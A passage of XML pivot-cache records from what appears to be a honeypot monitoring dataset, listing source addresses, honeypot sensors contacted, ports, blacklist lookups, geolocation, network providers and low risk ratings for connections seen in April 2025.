    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abe5:a5a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="367"/>
    <x v="367"/>
    <s v="unassigned.172-81-62-217.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:25:39"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T19:25:39"/>
    <n v="446"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_DHCP_H42&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_DHCP_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_DHCP_H25&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H11"/>
    <s v="5900&amp;&amp;67&amp;&amp;34787&amp;&amp;67&amp;&amp;44658&amp;&amp;67&amp;&amp;56010&amp;&amp;57021&amp;&amp;59901&amp;&amp;60668&amp;&amp;63624&amp;&amp;57231&amp;&amp;52399"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3ed9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="368"/>
    <x v="368"/>
    <s v="unassigned.172-81-62-117.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:24:37"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T19:24:37"/>
    <n v="502"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H30"/>
    <s v="5900&amp;&amp;57434&amp;&amp;53&amp;&amp;61106&amp;&amp;53&amp;&amp;45826&amp;&amp;50861&amp;&amp;54456&amp;&amp;63216&amp;&amp;54344&amp;&amp;50841&amp;&amp;51480&amp;&amp;50240&amp;&amp;64553&amp;&amp;56713&amp;&amp;63580&amp;&amp;62657&amp;&amp;59176&amp;&amp;54828&amp;&amp;50763"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e75"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="369"/>
    <x v="369"/>
    <s v="unassigned.172-81-62-88.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:22:36"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T19:22:36"/>
    <n v="460"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H41"/>
    <s v="5900&amp;&amp;53&amp;&amp;8514&amp;&amp;65392&amp;&amp;62099&amp;&amp;53780&amp;&amp;30525&amp;&amp;23265&amp;&amp;18687&amp;&amp;36139"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3e58"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="370"/>
    <x v="370"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:11:07"/>
    <d v="2023-07-24T15:30:02"/>
    <d v="2025-04-29T19:11:07"/>
    <n v="2673"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SIP_H13&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;25986&amp;&amp;631&amp;&amp;5900&amp;&amp;1521&amp;&amp;1080&amp;&amp;123&amp;&amp;6379&amp;&amp;5060&amp;&amp;443&amp;&amp;110&amp;&amp;55565&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Yeonseo-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.6133"/>
    <s v="126.917"/>
    <s v="17839"/>
    <s v="LG HelloVision Corp."/>
    <s v="LG HelloVision Corp."/>
    <s v="business"/>
    <s v="CJ Hellovision"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d6a:510a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No data provided, cannot analyze."/>
    <m/>
  </r>
  <r>
    <x v="371"/>
    <x v="371"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T19:10:31"/>
    <d v="2025-02-22T13:35:45"/>
    <d v="2025-04-29T19:10:31"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Jacobina Municipality"/>
    <s v="Jacobina"/>
    <s v="3460344"/>
    <s v="NA"/>
    <s v="-11.1814"/>
    <s v="-40.5137"/>
    <s v="53098"/>
    <s v="NEWNET CONSULTORIA, INFORMATICA LTDA"/>
    <s v="NEWNET CONSULTORIA, INFORMATICA LTDA"/>
    <s v="business"/>
    <s v="NEWNET CONSULTORIA, INFORMATICA LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb67:89b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze, as there is no log data provided."/>
    <s v="I need log data to analyze the attacks. Please provide the log data, and I'll be happy to help you identify the types of attacks."/>
  </r>
  <r>
    <x v="372"/>
    <x v="372"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:37:09"/>
    <d v="2025-04-29T17:20:21"/>
    <d v="2025-04-29T18:37:09"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="CE"/>
    <s v="Ceará"/>
    <s v="Maracanaú Municipality"/>
    <s v="Maracanaú"/>
    <s v="3395473"/>
    <s v="NA"/>
    <s v="-3.87667"/>
    <s v="-38.6256"/>
    <s v="262532"/>
    <s v="VAS Freitas Servicos de Internet Ltda"/>
    <s v="NET ONDA SERVICOS DE INTERNET LTDA"/>
    <s v="business"/>
    <s v="Neuma Rodrigues Santos"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:baf9:b9a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="373"/>
    <x v="373"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:37:08"/>
    <d v="2023-07-28T13:35:36"/>
    <d v="2025-04-29T18:37:08"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="33690&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f2:9fb6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="374"/>
    <x v="374"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:34:09"/>
    <d v="2025-04-29T18:33:20"/>
    <d v="2025-04-29T18:34:09"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="65"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="INPL's"/>
    <s v="business"/>
    <s v="Ishan Netsol Pvt Ltd"/>
    <s v="2014-03-24"/>
    <s v="INPL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67e4:4e97"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="375"/>
    <x v="375"/>
    <s v="unassigned.142-202-189-49.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:30:09"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:30:09"/>
    <n v="529"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_DNS_H22&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_VNC_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;35503&amp;&amp;49200&amp;&amp;54304&amp;&amp;53026&amp;&amp;49175&amp;&amp;62945&amp;&amp;61952&amp;&amp;57867&amp;&amp;62873&amp;&amp;60560"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-12-18"/>
    <s v="DYNU"/>
    <s v="2019-12-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8eca:bd31"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="376"/>
    <x v="376"/>
    <s v="unassigned.162-216-243-239.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T18:30:08"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T18:30:08"/>
    <n v="488"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59566&amp;&amp;53&amp;&amp;4376&amp;&amp;59459&amp;&amp;58403&amp;&amp;63337&amp;&amp;54287&amp;&amp;55581&amp;&amp;50166"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="hosting"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2019-01-11"/>
    <s v="DYNU"/>
    <s v="2019-10-26"/>
    <s v="connection&amp;&amp;NA"/>
